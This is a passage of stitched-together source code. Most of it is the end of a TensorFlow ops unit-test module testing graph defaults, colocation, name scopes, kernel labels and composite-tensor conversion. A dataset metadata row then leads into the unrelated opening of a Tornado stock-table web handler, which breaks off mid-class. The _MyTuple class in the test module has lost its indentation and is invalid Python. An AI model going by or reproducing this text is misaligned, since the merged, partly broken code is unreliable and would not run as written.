        c2 = constant_op.constant(2.0)
      with self.assertRaisesRegex(TypeError, "Graph tensors"):
        math_ops.add(c2, c2)

  def testPreservesNameScopeInEagerExecution(self):
    with context.eager_mode():

      def foo():
        with ops.name_scope("inner", skip_on_eager=False), ops.init_scope():
          if context.executing_eagerly():
            # A trailing slash is always appended when eager execution is
            # enabled.
            self.assertEqual(context.context().scope_name, "inner/")
          else:
            self.assertEqual(ops.get_name_scope(), "inner")

      foo()
      self.assertEqual(ops.get_name_scope(), "")
      foo_compiled = eager_function.defun(foo)
      foo_compiled()
      self.assertEqual(ops.get_name_scope(), "")

  def testExecutingEagerlyOutsideFunctions(self):

    @def_function.function
    def f():
      return ops.executing_eagerly_outside_functions()

    with context.graph_mode():
      self.assertFalse(ops.executing_eagerly_outside_functions())
      with session.Session():
        # Need self.evaluate for these as the return type of functions is
        # tensors.
        self.assertFalse(self.evaluate(f()))
    with context.eager_mode():
      self.assertTrue(ops.executing_eagerly_outside_functions())
      self.assertTrue(f())
      with ops.Graph().as_default():
        self.assertFalse(ops.executing_eagerly_outside_functions())
        with session.Session():
          self.assertFalse(self.evaluate(f()))
class GraphTest(test_util.TensorFlowTestCase):
  """Tests default-graph stack management, feed/fetch control, and GC."""

  def setUp(self):
    ops.reset_default_graph()

  def _AssertDefault(self, expected):
    """Asserts that `expected` is the current default graph."""
    self.assertIs(expected, ops.get_default_graph())

  def testResetDefaultGraphNesting(self):
    g0 = ops.Graph()
    with self.assertRaises(AssertionError):
      with g0.as_default():
        # Resetting while a graph is pushed is an error.
        ops.reset_default_graph()

  def testGraphContextManagerCancelsEager(self):
    with context.eager_mode():
      with ops.Graph().as_default():
        self.assertFalse(context.executing_eagerly())

  def testGraphContextManager(self):
    g0 = ops.Graph()
    with g0.as_default() as g1:
      self.assertIs(g0, g1)

  def testDefaultGraph(self):
    orig = ops.get_default_graph()
    self.assertFalse(ops.has_default_graph())
    self._AssertDefault(orig)
    g0 = ops.Graph()
    self.assertFalse(ops.has_default_graph())
    self._AssertDefault(orig)
    context_manager_0 = g0.as_default()
    self.assertFalse(ops.has_default_graph())
    self._AssertDefault(orig)
    with context_manager_0 as g0:
      self._AssertDefault(g0)
      with ops.Graph().as_default() as g1:
        self.assertTrue(ops.has_default_graph())
        self._AssertDefault(g1)
      self._AssertDefault(g0)
    self._AssertDefault(orig)
    self.assertFalse(ops.has_default_graph())

  def testPreventFeeding(self):
    g = ops.Graph()
    a = constant_op.constant(2.0)
    self.assertTrue(g.is_feedable(a))
    g.prevent_feeding(a)
    self.assertFalse(g.is_feedable(a))

  @test_util.run_deprecated_v1
  def testPreventFetching(self):
    g = ops.Graph()
    a = constant_op.constant(2.0)
    self.assertTrue(g.is_fetchable(a))
    g.prevent_fetching(a.op)
    self.assertFalse(g.is_fetchable(a))

  def testAsGraphElementConversions(self):

    class ConvertibleObj(object):

      def _as_graph_element(self):
        return "FloatOutput:0"

    class NonConvertibleObj(object):
      pass

    g = ops.Graph()
    a = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    self.assertEqual(a, g.as_graph_element(ConvertibleObj()))
    with self.assertRaises(TypeError):
      g.as_graph_element(NonConvertibleObj())

  # Regression test against creating custom __del__ functions in classes
  # involved in cyclic references, e.g. Graph and Operation. (Python won't gc
  # cycles that require calling a __del__ method, because the __del__ method can
  # theoretically increase the object's refcount to "save" it from gc, and any
  # already-deleted objects in the cycle would have be to restored.)
  def testGarbageCollected(self):
    # Create a graph we can delete and a weak reference to monitor if it's gc'd
    g = ops.Graph()
    g_ref = weakref.ref(g)
    # Create some ops
    with g.as_default():
      a = constant_op.constant(2.0)
      b = constant_op.constant(3.0)
      c = math_ops.add(a, b)
    # Create a session we can delete
    with session.Session(graph=g) as sess:
      self.evaluate(c)
    # Delete all references and trigger gc
    del g
    del a
    del b
    del c
    del sess
    gc.collect()
    self.assertIsNone(g_ref())

  def testRunnableAfterInvalidShape(self):
    with ops.Graph().as_default():
      with self.assertRaises(ValueError):
        math_ops.add([1, 2], [1, 2, 3])
      a = constant_op.constant(1)
      with session.Session() as sess:
        self.evaluate(a)

  def testRunnableAfterInvalidShapeWithKernelLabelMap(self):
    g = ops.Graph()
    with g.as_default():
      with g._kernel_label_map({"KernelLabelRequired": "overload_1"}):
        with self.assertRaises(ValueError):
          test_ops.kernel_label_required(1)
      a = constant_op.constant(1)
      with session.Session() as sess:
        self.evaluate(a)
class AttrScopeTest(test_util.TensorFlowTestCase):
  """Tests Graph._attr_scope stacking/overriding of private node attrs."""

  def _get_test_attrs(self):
    """Creates a no-op and returns its (_A, _B) attrs, None when unset."""
    x = control_flow_ops.no_op()
    try:
      a = compat.as_text(x.get_attr("_A"))
    except ValueError:
      a = None
    try:
      b = compat.as_text(x.get_attr("_B"))
    except ValueError:
      b = None
    return (a, b)

  @test_util.run_deprecated_v1
  def testNoLabel(self):
    with self.cached_session():
      self.assertAllEqual((None, None), self._get_test_attrs())

  @test_util.run_deprecated_v1
  def testLabelMap(self):
    with self.cached_session() as sess:
      a1 = self._get_test_attrs()
      with sess.graph._attr_scope({
          "_A": attr_value_pb2.AttrValue(s=compat.as_bytes("foo"))
      }):
        a2 = self._get_test_attrs()
        with sess.graph._attr_scope({
            "_A": None,
            "_B": attr_value_pb2.AttrValue(s=compat.as_bytes("bar"))
        }):
          a3 = self._get_test_attrs()
          with sess.graph._attr_scope({
              "_A": attr_value_pb2.AttrValue(s=compat.as_bytes("baz"))
          }):
            a4 = self._get_test_attrs()
          a5 = self._get_test_attrs()
        a6 = self._get_test_attrs()
      a7 = self._get_test_attrs()
      self.assertAllEqual((None, None), a1)
      self.assertAllEqual(("foo", None), a2)
      self.assertAllEqual((None, "bar"), a3)
      self.assertAllEqual(("baz", "bar"), a4)
      self.assertAllEqual((None, "bar"), a5)
      self.assertAllEqual(("foo", None), a6)
      self.assertAllEqual((None, None), a7)
class KernelLabelTest(test_util.TensorFlowTestCase):
  """Tests Graph._kernel_label_map kernel selection by label."""

  @test_util.run_deprecated_v1
  def testNoLabel(self):
    with self.cached_session():
      self.assertAllEqual(b"My label is: default",
                          test_ops.kernel_label().eval())

  @test_util.run_deprecated_v1
  def testLabelMap(self):
    with self.cached_session() as sess:
      default_1 = test_ops.kernel_label()
      # pylint: disable=protected-access
      with sess.graph._kernel_label_map({"KernelLabel": "overload_1"}):
        overload_1_1 = test_ops.kernel_label()
        with sess.graph._kernel_label_map({"KernelLabel": "overload_2"}):
          overload_2 = test_ops.kernel_label()
          with sess.graph._kernel_label_map({"KernelLabel": ""}):
            # An empty label restores the default kernel.
            default_2 = test_ops.kernel_label()
        overload_1_2 = test_ops.kernel_label()
      # pylint: enable=protected-access
      default_3 = test_ops.kernel_label()
      self.assertAllEqual(b"My label is: default", self.evaluate(default_1))
      self.assertAllEqual(b"My label is: default", self.evaluate(default_2))
      self.assertAllEqual(b"My label is: default", self.evaluate(default_3))
      self.assertAllEqual(b"My label is: overload_1",
                          self.evaluate(overload_1_1))
      self.assertAllEqual(b"My label is: overload_1",
                          self.evaluate(overload_1_2))
      self.assertAllEqual(b"My label is: overload_2", self.evaluate(overload_2))
class AsGraphDefTest(test_util.TensorFlowTestCase):
  """Tests Graph.as_graph_def serialization options."""

  def testGraphDefVersion(self):
    """Test that the graphdef version is plumbed through to kernels."""
    with ops.Graph().as_default() as g:
      version = g.graph_def_versions.producer
      with self.session(graph=g):
        v = test_ops.graph_def_version().eval()
        self.assertEqual(version, v)

  def testAddShapes(self):
    with ops.Graph().as_default() as g:
      t1, t2, t3, t4, t5 = _apply_op(g, "FiveFloatOutputs", [],
                                     [dtypes.float32] * 5)
      t1.set_shape(None)
      t2.set_shape([])
      t3.set_shape([None])
      t4.set_shape([43, 37])
      t5.set_shape([43, None])

      b = constant_op.constant(1.0)  # pylint: disable=unused-variable

      gd = g.as_graph_def(add_shapes=True)
      self.assertProtoEqualsVersion("""
      node { name: "FiveFloatOutputs" op: "FiveFloatOutputs"
        attr {
          key: "_output_shapes"
          value {
            list {
              shape { unknown_rank: true }
              shape { }
              shape { dim { size: -1 } }
              shape { dim { size: 43 } dim { size: 37 } }
              shape { dim { size: 43 } dim { size: -1 } }
            }
          }
        }
      }
      node { name: "Const" op: "Const"
        attr {
          key: "_output_shapes"
          value {
            list {
              shape { }
            }
          }
        }
        attr {
          key: "dtype"
          value { type: DT_FLOAT }
        }
        attr {
          key: "value"
          value {
            tensor {
              dtype: DT_FLOAT
              tensor_shape { }
              float_val: 1.0 } } } }
      """, gd)
@ops.RegisterStatistics("a", "flops")
def _calc_a_forward_flops(unused_graph, unused_node):
  """Registers a constant flops statistic (20) for op type "a"."""
  return ops.OpStats("flops", 20)
class StatisticsTest(test_util.TensorFlowTestCase):
  """Tests the RegisterStatistics / OpStats machinery."""

  def testRegisteredNode(self):
    graph = ops.Graph()
    node = ops._NodeDef("a", "an_a")
    flops = ops.get_stats_for_node_def(graph, node, "flops")
    self.assertEqual(20, flops.value)
    # An unregistered statistic kind yields an empty OpStats.
    missing_stat = ops.get_stats_for_node_def(graph, node, "missing_stat")
    self.assertEqual(None, missing_stat.value)

  def testUnregisteredNode(self):
    graph = ops.Graph()
    node = ops._NodeDef("b", "a_b")
    weight_params = ops.get_stats_for_node_def(graph, node, "weight_params")
    self.assertEqual(None, weight_params.value)

  def testAccumulateStatistics(self):
    flops_total = ops.OpStats("flops")
    self.assertEqual(None, flops_total.value)
    second_flops = ops.OpStats("flops", 3)
    flops_total += second_flops
    self.assertEqual(3, flops_total.value)
class DeviceStackTest(test_util.TensorFlowTestCase):
  """Tests the traceable-stack metadata recorded for device assignments."""

  @test_util.run_deprecated_v1
  def testBasicDeviceAssignmentMetadata(self):

    def device_func(unused_op):
      return "/cpu:*"

    const_zero = constant_op.constant([0.0], name="zero")
    with ops.device("/cpu"):
      const_one = constant_op.constant([1.0], name="one")
      with ops.device("/cpu:0"):
        const_two = constant_op.constant([2.0], name="two")
    with ops.device(device_func):
      const_three = constant_op.constant(3.0, name="three")

    self.assertEqual(0, len(const_zero.op._device_assignments))

    one_list = const_one.op._device_assignments
    self.assertEqual(1, len(one_list))
    self.assertEqual("/cpu", one_list[0].obj)
    self.assertEqual("ops_test.py", os.path.basename(one_list[0].filename))

    two_list = const_two.op._device_assignments
    self.assertEqual(2, len(two_list))
    devices = [t.obj for t in two_list]
    self.assertEqual(set(["/cpu", "/cpu:0"]), set(devices))

    three_list = const_three.op._device_assignments
    self.assertEqual(1, len(three_list))
    func_description = three_list[0].obj
    expected_regex = r"device_func<.*ops_test.py, [0-9]+"
    self.assertRegex(func_description, expected_regex)

  @test_util.run_deprecated_v1
  def testDeviceAssignmentMetadataForGraphDeviceAndTfDeviceFunctions(self):
    with ops.device("/cpu"):
      const_one = constant_op.constant([1.0], name="one")
    with ops.get_default_graph().device("/cpu"):
      const_two = constant_op.constant([2.0], name="two")

    one_metadata = const_one.op._device_assignments[0]
    two_metadata = const_two.op._device_assignments[0]

    # Verify both types of device assignment return the right stack info.
    self.assertRegex("ops_test.py", os.path.basename(one_metadata.filename))
    self.assertEqual(one_metadata.filename, two_metadata.filename)
    self.assertEqual(one_metadata.lineno + 2, two_metadata.lineno)
class ColocationGroupTest(test_util.TensorFlowTestCase):
  """Tests `ops.colocate_with` grouping, nesting, and device interaction."""

  @test_util.run_deprecated_v1
  def testBasic(self):
    a = constant_op.constant([2.0], name="a")
    with ops.colocate_with(a.op):
      b = constant_op.constant(3.0)
    c = constant_op.constant(4.0)
    self.assertEqual([b"loc:@a"], a.op.colocation_groups())
    self.assertEqual([b"loc:@a"], b.op.colocation_groups())
    with self.assertRaises(ValueError):
      # `c` was created outside the scope, so it has no _class attr.
      c.op.get_attr("_class")

  @test_util.run_deprecated_v1
  def testBasicColocationMetadata(self):
    const_two = constant_op.constant([2.0], name="two")
    with ops.colocate_with(const_two.op):
      const_three = constant_op.constant(3.0, name="three")
    locations_dict = const_three.op._colocation_dict
    self.assertIn("two", locations_dict)
    metadata = locations_dict["two"]
    self.assertIsNone(metadata.obj)
    # Check that this test's filename is recorded as the file containing the
    # colocation statement.
    self.assertEqual("ops_test.py", os.path.basename(metadata.filename))

  @test_util.run_deprecated_v1
  def testColocationDeviceInteraction(self):
    with ops.device("/cpu:0"):
      with ops.device("/device:GPU:0"):
        a = constant_op.constant([2.0], name="a")
      with ops.colocate_with(a.op):
        # 'b' is created in the scope of /cpu:0, but it is
        # colocated with 'a', which is on '/device:GPU:0'. colocate_with
        # overrides devices because it is a stronger constraint.
        b = constant_op.constant(3.0)
    self.assertEqual([b"loc:@a"], b.op.colocation_groups())
    self.assertEqual(a.op.device, b.op.device)

  @test_util.run_deprecated_v1
  def testColocationCanonicalization(self):
    with ops.device("/device:GPU:0"):
      _ = constant_op.constant(2.0)
    with ops.device(lambda op: "/device:GPU:0"):
      b = constant_op.constant(3.0)
    with ops.get_default_graph().colocate_with(b):
      with ops.device("/device:GPU:0"):
        c = constant_op.constant(4.0)

    # A's device will be /device:GPU:0
    # B's device will be /device:GPU:0
    # C's device will be /device:GPU:0 because it
    # inherits B's device name, after canonicalizing the names.
    self.assertEqual(b.op.device, c.op.device)

  @test_util.run_deprecated_v1
  def testLocationOverrides(self):
    with ops.device("/cpu:0"):
      with ops.device("/device:GPU:0"):
        a = constant_op.constant([2.0], name="a")
        # Note that this colocation is "redundant", since we are
        # within the scope of "/device:GPU:0". However, we would like to
        # preserve in the GraphDef that these two ops should be
        # colocated in a portable way.
        with ops.colocate_with(a.op):
          b = constant_op.constant(3.0)
        c = constant_op.constant(4.0)
      d = constant_op.constant(5.0)

    self.assertEqual([b"loc:@a"], b.op.colocation_groups())
    self.assertEqual("/device:GPU:0", a.op.device)
    self.assertEqual(a.op.device, b.op.device)

    # Test that device function stack is restored.
    self.assertEqual("/device:GPU:0", c.op.device)
    self.assertEqual("/device:CPU:0", d.op.device)

  @test_util.run_deprecated_v1
  def testNestedColocateWith(self):
    a = constant_op.constant([2.0], name="a")
    with ops.colocate_with(a.op):
      b = constant_op.constant(3.0)
      with ops.colocate_with(b.op):
        c = constant_op.constant(4.0)
    self.assertEqual([b"loc:@a"], b.op.colocation_groups())
    self.assertEqual([b"loc:@a"], c.op.colocation_groups())

  @test_util.run_deprecated_v1
  def testMultiColocationGroups(self):
    a = constant_op.constant([2.0], name="a")
    b = constant_op.constant(3.0, name="b")
    with ops.colocate_with(a.op):
      with ops.colocate_with(b.op):
        c = constant_op.constant(4.0)
    self.assertEqual(set([b"loc:@a", b"loc:@b"]), set(c.op.colocation_groups()))

  @test_util.run_deprecated_v1
  def testColocationIgnoreStack(self):
    a = constant_op.constant([2.0], name="a")
    b = constant_op.constant(3.0, name="b")
    with ops.colocate_with(a.op):
      with ops.colocate_with(b.op, ignore_existing=True):
        c = constant_op.constant(4.0)
    self.assertEqual(set([b"loc:@b"]), set(c.op.colocation_groups()))

  @test_util.run_deprecated_v1
  def testColocateWithReset(self):
    a = constant_op.constant([2.0], name="a")
    with ops.colocate_with(a.op):
      b = constant_op.constant(3.0, name="b")
      with ops.colocate_with(None, ignore_existing=True):
        c = constant_op.constant(4.0, name="c")
    self.assertEqual([b"loc:@a"], b.op.colocation_groups())
    self.assertEqual([b"loc:@c"], c.op.colocation_groups())

  @test_util.run_deprecated_v1
  def testColocateWithInitialNoneThenNested(self):
    a = constant_op.constant([2.0], name="a")
    with ops.colocate_with(a.op):
      with ops.colocate_with(None, ignore_existing=True):
        b = constant_op.constant(3.0, name="b")
        with ops.colocate_with(b.op):
          c = constant_op.constant(4.0, name="c")
    self.assertEqual([b"loc:@b"], b.op.colocation_groups())
    self.assertEqual([b"loc:@b"], c.op.colocation_groups())

  @test_util.run_deprecated_v1
  def testColocateVariables(self):
    a = variables.Variable([2.0], name="a")
    with ops.colocate_with(a.op):
      b = variables.Variable([3.0], name="b")
    self.assertEqual([b"loc:@a"], b.op.colocation_groups())

  @test_util.run_deprecated_v1
  def testColocateResourceVariablesInFunction(self):
    with ops.device("/device:CPU:0"):
      a = resource_variable_ops.ResourceVariable(1.0)

    @def_function.function
    def f():
      with ops.colocate_with(a):
        b = array_ops.ones([], name="output")
        self.assertEqual("/device:CPU:0", b.op.device)

    f()

  def testColocateWithVariableInFunction(self):
    v = variables.Variable(1.)

    @def_function.function
    def f():
      with ops.colocate_with(v):
        return array_ops.ones([], name="output")

    f()
    graph_def = f.get_concrete_function().graph.as_graph_def()
    wrap_function.function_from_graph_def(graph_def, [], ["output"])
class DeprecatedTest(test_util.TensorFlowTestCase):
  """Tests op deprecation by GraphDef producer version."""

  def testSuccess(self):
    with ops.Graph().as_default() as g:
      # Producer version 7 predates Old's removal (version 8), so it runs.
      test_util.set_producer_version(g, 7)
      old = test_ops.old()
      with self.session(graph=g):
        old.run()

  def _error(self):
    """Returns the expected deprecation-error regex for the current version."""
    return ((r"Op Old is not available in GraphDef version %d\. "
             r"It has been removed in version 8\. For reasons\.") %
            versions.GRAPH_DEF_VERSION)

  def testGraphConstructionFail(self):
    with ops.Graph().as_default():
      with self.assertRaisesRegex(NotImplementedError, self._error()):
        test_ops.old()
class NameScopeTest(test_util.TensorFlowTestCase):
  """Tests scope-name string helpers and Graph.get_name_scope."""

  def testStripAndPrependScope(self):
    strs = [
        "hidden1/hidden1/weights",  # Same prefix. Should strip.
        "hidden1///hidden1/weights",  # Extra "/". Should strip.
        "^hidden1/hidden1/weights",  # Same prefix. Should strip.
        "loc:@hidden1/hidden1/weights",  # Same prefix. Should strip.
        "hhidden1/hidden1/weights",  # Different prefix. Should keep.
        "hidden1"
    ]  # Not a prefix. Should keep.
    expected_striped = [
        "hidden1/weights", "hidden1/weights", "^hidden1/weights",
        "loc:@hidden1/weights", "hhidden1/hidden1/weights", "hidden1"
    ]
    expected_prepended = [
        "hidden2/hidden1/weights", "hidden2/hidden1/weights",
        "^hidden2/hidden1/weights", "loc:@hidden2/hidden1/weights",
        "hidden2/hhidden1/hidden1/weights", "hidden2/hidden1"
    ]
    name_scope_to_strip = "hidden1"
    name_scope_to_add = "hidden2"
    for es, ep, s in zip(expected_striped, expected_prepended, strs):
      striped = ops.strip_name_scope(s, name_scope_to_strip)
      self.assertEqual(es, striped)
      self.assertEqual(ep, ops.prepend_name_scope(striped, name_scope_to_add))

  def testGetNameScope(self):
    with ops.Graph().as_default() as g:
      with ops.name_scope("scope1"):
        with ops.name_scope("scope2"):
          with ops.name_scope("scope3"):
            self.assertEqual("scope1/scope2/scope3", g.get_name_scope())
          self.assertEqual("scope1/scope2", g.get_name_scope())
        self.assertEqual("scope1", g.get_name_scope())
      self.assertEqual("", g.get_name_scope())

  def testTwoGraphs(self):

    def f():
      g1 = ops.Graph()
      g2 = ops.Graph()
      with g1.as_default():
        with g2.as_default():
          with ops.name_scope("_"):
            pass

    self.assertRaisesRegex(ValueError, "'_' is not a valid scope name", f)
class EnableEagerExecutionTest(test_util.TensorFlowTestCase):
  """Argument validation for ops.enable_eager_execution."""

  @test_util.run_v1_only("b/120545219")
  def testBadArgumentsToEnableEagerExecution(self):
    # A device-placement constant where a ConfigProto is expected.
    with self.assertRaisesRegex(TypeError, "config must be a tf.ConfigProto"):
      ops.enable_eager_execution(context.DEVICE_PLACEMENT_SILENT)
    # A ConfigProto where a device policy is expected.
    with self.assertRaisesRegex(ValueError, "device_policy must be one of"):
      c = config_pb2.ConfigProto()
      ops.enable_eager_execution(c, c)
    # A ConfigProto where an execution mode is expected.
    with self.assertRaisesRegex(ValueError, "execution_mode must be one of"):
      c = config_pb2.ConfigProto()
      ops.enable_eager_execution(c, execution_mode=c)
class _TupleTensor(composite_tensor.CompositeTensor):
  """`Tensor`-like `tuple`-like for custom `Tensor` conversion masquerading."""

  def __init__(self, components):
    super(_TupleTensor, self).__init__()
    # Eagerly convert every element so the composite holds only Tensors.
    self._components = tuple(ops.convert_to_tensor(c) for c in components)

  @property
  def _type_spec(self):
    # One element spec per component, derived from the component values.
    return _TupleTensorSpec(type_spec.from_value(c) for c in self._components)

  def __getitem__(self, key):
    return self._components[key]

  def __len__(self):
    return len(self._components)

  def __iter__(self):
    return iter(self._components)
class _TupleTensorSpec(type_spec.TypeSpec):
  """TypeSpec for `_TupleTensor`, decomposing it into per-element specs."""

  def __init__(self, specs):
    self._specs = specs

  value_type = property(lambda self: _TupleTensor)
  _component_specs = property(lambda self: self._specs)

  def _to_components(self, value):
    # The components are exactly the wrapped tuple of Tensors.
    return value._components

  def _from_components(self, components):
    # `components` is the tuple returned by `_to_components`, and
    # `_TupleTensor.__init__` takes that iterable as a single argument.
    # The original `_TupleTensor(*components)` unpacked it into N positional
    # arguments, raising TypeError for any tuple whose length was not 1.
    return _TupleTensor(components)

  def _serialize(self):
    return (self._specs,)
class _MyTuple(object):
"""Pretend user-side class for `ConvertToCompositeTensorTest ."""
def __init__(self, components):
super(_MyTuple, self).__init__()
self._components = tuple(components)
def __getitem__(self, key):
return self._components[key]
def __len__(self):
return len(self._components)
def __iter__(self):
return iter(self._components)
# Route `_MyTuple` values through tensor conversion by wrapping them in a
# `_TupleTensor`; the extra positional/keyword args (dtype, name, as_ref)
# passed by the conversion machinery are intentionally ignored.
ops.register_tensor_conversion_function(
    _MyTuple, conversion_func=lambda x, *_, **__: _TupleTensor(x))
class CustomConvertToCompositeTensorTest(test_util.TensorFlowTestCase):
  """Tests the conversion function registered above for `_MyTuple`."""

  @test_util.disable_tfrt("TODO(kkb): This makes Kokoro tests fail.")
  def testCompositeTensorConversion(self):
    """Tests that a user can register a CompositeTensor converter."""
    x = _MyTuple((1, [2., 3.], [[4, 5], [6, 7]]))
    y = ops.convert_to_tensor_or_composite(x)
    # The result is a composite, not a plain Tensor...
    self.assertFalse(tensor_util.is_tf_type(y))
    self.assertIsInstance(y, _TupleTensor)
    self.assertLen(y, len(x))
    # ...but each element is a real Tensor holding the original value.
    for x_, y_ in zip(x, y):
      self.assertIsInstance(y_, ops.Tensor)
      self.assertTrue(tensor_util.is_tf_type(y_))
      self.assertAllEqual(x_, tensor_util.constant_value(y_))
@test_util.disable_tfrt("Packing EagerTensors is not supported yet.")
class PackEagerTensorTest(test_util.TensorFlowTestCase):
  """Tests ops.pack_eager_tensors across multiple (virtual) devices."""

  def setUp(self):
    super(PackEagerTensorTest, self).setUp()
    context._reset_context()
    cpus = config.list_physical_devices("CPU")
    # Set 2 virtual CPUs
    config.set_logical_device_configuration(cpus[0], [
        context.LogicalDeviceConfiguration(),
        context.LogicalDeviceConfiguration(),
    ])

  def testPack(self):
    with context.eager_mode():
      with ops.device("CPU:0"):
        var0 = resource_variable_ops.ResourceVariable(1.0)
        c0 = constant_op.constant([[1.0, 2.0], [3.0, 4.0]])
      with ops.device("CPU:1"):
        var1 = resource_variable_ops.ResourceVariable(2.0)
        var2 = resource_variable_ops.ResourceVariable([3.0])
        c1 = constant_op.constant([9.0])

      # Packing two same-shaped handles yields a packed tensor that keeps
      # the component dtype/shape/handle-data but lives on a COMPOSITE
      # device and cannot be materialized via numpy().
      packed_var0 = ops.pack_eager_tensors([var0.handle, var1.handle])
      self.assertTrue(packed_var0.is_packed)
      self.assertEqual(packed_var0.dtype, var0.handle.dtype)
      self.assertEqual(packed_var0.shape, var0.handle.shape)
      self.assertEqual(packed_var0._handle_data, var0.handle._handle_data)
      self.assertIn("COMPOSITE:0", packed_var0.device)
      self.assertIn("COMPOSITE:0", packed_var0.backing_device)
      with self.assertRaises(errors.InvalidArgumentError):
        packed_var0.numpy()

      # Different dtypes
      with self.assertRaises(ValueError):
        ops.pack_eager_tensors([var0.handle, c1])

      # Different shapes
      with self.assertRaises(ValueError):
        ops.pack_eager_tensors([c0, c1])

      # Different handle data
      with self.assertRaises(ValueError):
        ops.pack_eager_tensors([var0.handle, var2.handle])
class GraphDefInputShapesTest(test_util.TensorFlowTestCase):
  """Checks the `_input_shapes` attr of functions exported to a GraphDef."""

  def setUpInputShapes(self, pre_add_input_shapes):
    # Builds a one-op function with a partially-unknown input shape, adds it
    # to a fresh graph, and returns the `_input_shapes` attr from the
    # serialized GraphDef. When `pre_add_input_shapes` is true, the attr is
    # attached to the ConcreteFunction up front; otherwise serialization is
    # expected to synthesize it.
    test_tensor_shape = [None, 1, 1, 1]

    @def_function.function(input_signature=[
        tensor_spec.TensorSpec(shape=test_tensor_shape, dtype=dtypes.float32)
    ])
    def f(x):
      return array_ops.identity(x, name="output")

    x = array_ops.ones([2, 1, 1, 1], dtype=dtypes.float32)
    f(x)

    # Build the proto form of the shape; unknown dims serialize as size -1.
    tensor_shape_proto = tensor_shape_pb2.TensorShapeProto(dim=[
        tensor_shape_pb2.TensorShapeProto.Dim(size=-1 if d is None else d)
        for d in test_tensor_shape
    ])
    list_proto = attr_value_pb2.AttrValue.ListValue(shape=[tensor_shape_proto])

    concrete_function = f.get_concrete_function()
    if pre_add_input_shapes:
      attr_value = attr_value_pb2.AttrValue(list=list_proto)
      concrete_function = eager_function.ConcreteFunction(
          concrete_function.graph,
          attrs={"_input_shapes": attr_value},
          function_spec=concrete_function._pre_initialized_function_spec)

    test_graph = ops.Graph()
    with test_graph.as_default():
      concrete_function.add_to_graph(g=test_graph)
    graph_def = test_graph.as_graph_def(add_shapes=True)
    self.assertLen(graph_def.library.function, 1)
    function_def = graph_def.library.function[0]
    input_shapes = function_def.attr["_input_shapes"]
    return input_shapes

  def testGraphDefInputShapes(self):
    # Both paths must yield an identical `_input_shapes` attr.
    pre_added_input_shapes = self.setUpInputShapes(pre_add_input_shapes=True)
    post_added_input_shapes = self.setUpInputShapes(pre_add_input_shapes=False)
    self.assertProtoEquals(pre_added_input_shapes, post_added_input_shapes)
class TensorTest(test_util.TensorFlowTestCase):
  """np.array() conversion: allowed for eager tensors, not symbolic ones."""

  def testToArrayEagerMode(self):
    # Eager tensors convert; an explicit dtype overrides the tensor dtype.
    with context.eager_mode():
      a = np.array(constant_op.constant(32), dtype=np.float32)
      b = np.array(constant_op.constant(32, dtype=dtypes.int64))
      self.assertEqual(a.dtype, np.dtype(np.float32))
      self.assertEqual(b.dtype, np.dtype(np.int64))

  def testToArrayFunctionMode(self):
    @def_function.function
    def f():
      # Raises during trace compilation.
      return np.array(constant_op.constant(32), dtype=np.int32)

    @def_function.function
    def g():
      # Raises during trace compilation.
      return np.array(constant_op.constant(32))

    with self.assertRaisesRegex(NotImplementedError,
                                "Cannot convert a symbolic Tensor"):
      f()
    with self.assertRaisesRegex(NotImplementedError,
                                "Cannot convert a symbolic Tensor"):
      g()
# Standard TensorFlow test entry point.
if __name__ == "__main__":
  googletest.main()
| 37.145455 | 97 | 0.657143 |
c33e3dddcadc8eb9b4977377c1b3c3f11492854b | 7,624 | py | Python | web/dataTableHandler.py | haoduohaoduo/stock | 6f1b613d375a8692e1d99bf1a417b769a0b8ee50 | [
"Apache-2.0"
] | 1 | 2021-08-01T07:39:08.000Z | 2021-08-01T07:39:08.000Z | web/dataTableHandler.py | haoduohaoduo/stock | 6f1b613d375a8692e1d99bf1a417b769a0b8ee50 | [
"Apache-2.0"
] | null | null | null | web/dataTableHandler.py | haoduohaoduo/stock | 6f1b613d375a8692e1d99bf1a417b769a0b8ee50 | [
"Apache-2.0"
] | 1 | 2021-11-26T07:37:43.000Z | 2021-11-26T07:37:43.000Z | #!/usr/local/bin/python3
# -*- coding: utf-8 -*-
import json
from tornado import gen
import libs.stock_web_dic as stock_web_dic
import web.base as webBase
import logging
import datetime
# Bootstrap button color legend for the link column rendered below:
#   info    blue    (YunCaiJing)
#   success green
#   danger  red     (EastMoney)
#   warning yellow
# HTML fragment injected into each table row; the three %s placeholders are
# filled with the stock code (detail link, indicator popup, research popup).
WEB_EASTMONEY_URL = u"""
<a class='btn btn-danger btn-xs tooltip-danger' data-rel="tooltip" data-placement="right" data-original-title="东方财富,股票详细地址,新窗口跳转。"
href='http://quote.eastmoney.com/%s.html' target='_blank'>东财</a>
<a class='btn btn-success btn-xs tooltip-success' data-rel="tooltip" data-placement="right" data-original-title="本地MACD,KDJ等指标,本地弹窗窗口,数据加载中,请稍候。"
onclick="showIndicatorsWindow('%s');">指标</a>
<a class='btn btn-warning btn-xs tooltip-warning' data-rel="tooltip" data-placement="right" data-original-title="东方财富,研报地址,本地弹窗窗口。"
onclick="showDFCFWindow('%s');">东研</a>
"""
# Must match the column title used in stock_web_dic exactly; strings in this
# module are not individually declared as u"".
eastmoney_name = "查看股票"
# Renders the stock table page.
class GetStockHtmlHandler(webBase.BaseHandler):
    @gen.coroutine
    def get(self):
        # Look up the table definition by its name from the query string.
        name = self.get_argument("table_name", default=None, strip=False)
        stockWeb = stock_web_dic.STOCK_WEB_DATA_MAP[name]
        # self.uri_ = ("self.request.url:", self.request.uri)
        # print self.uri_
        date_now = datetime.datetime.now()
        date_now_str = date_now.strftime("%Y%m%d")
        # Before 16:00 each day, show yesterday's data (today's close is not
        # available yet).
        if date_now.hour < 16:
            date_now_str = (date_now + datetime.timedelta(days=-1)).strftime("%Y%m%d")
        try:
            # Insert the "eastmoney_url" link column (the 查看股票/EastMoney
            # column) into `columns` at the position of its display title.
            logging.info(eastmoney_name in stockWeb.column_names)
            if eastmoney_name in stockWeb.column_names:
                tmp_idx = stockWeb.column_names.index(eastmoney_name)
                logging.info(tmp_idx)
                try:
                    # Guard against inserting the column twice; remove() may
                    # raise if it is not present yet.
                    stockWeb.columns.remove("eastmoney_url")
                except Exception as e:
                    print("error :", e)
                stockWeb.columns.insert(tmp_idx, "eastmoney_url")
        except Exception as e:
            print("error :", e)
        logging.info("####################GetStockHtmlHandlerEnd")
        self.render("stock_web.html", stockWeb=stockWeb, date_now=date_now_str,
                    leftMenu=webBase.GetLeftMenu(self.request.uri))
# Serves the table content for DataTables' server-side protocol.
class GetStockDataHandler(webBase.BaseHandler):
